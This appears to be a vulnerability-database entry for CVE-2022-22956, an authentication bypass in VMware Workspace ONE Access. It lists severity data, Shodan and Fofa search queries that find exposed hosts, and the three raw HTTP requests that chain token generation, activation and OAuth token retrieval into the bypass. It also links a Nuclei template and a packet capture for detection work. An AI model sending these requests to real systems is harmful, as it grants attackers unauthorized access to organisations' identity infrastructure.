🔙 목록으로 돌아가기

CVE-2022-22956: VMware Workspace ONE Access - Authentication Bypass

TitleVMware Workspace ONE Access - Authentication Bypass
Authordaffainfo
SeverityCritical
ImpactAttackers can bypass authentication and perform unauthorized operations, potentially leading to full system compromise.
RemediationApply the latest security patches provided by VMware to address these vulnerabilities.
CVSS Score9.8
EPSS Score0.81455
CVE IDCVE-2022-22956
CWE IDCWE-287
Shodan Queryhttp.favicon.hash:"-1250474341"
Fofa Queryicon_hash=-1250474341
Tags cve cve2022 vmware workspace auth-bypass vkev vuln

🔍 Vulnerability Description

VMware Workspace ONE Access has two authentication bypass vulnerabilities (CVE-2022-22955 & CVE-2022-22956) in the OAuth2 ACS framework. A malicious actor may bypass the authentication mechanism and execute any operation due to exposed endpoints in the authentication framework.

🌐 HTTP Request

POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

0
POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

dktX8T
POST /SAAS/auth/oauthtoken HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

grant_type=client_credentials&client_id=gjXsKe&client_secret=1TW5qv

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22956.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-22956.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A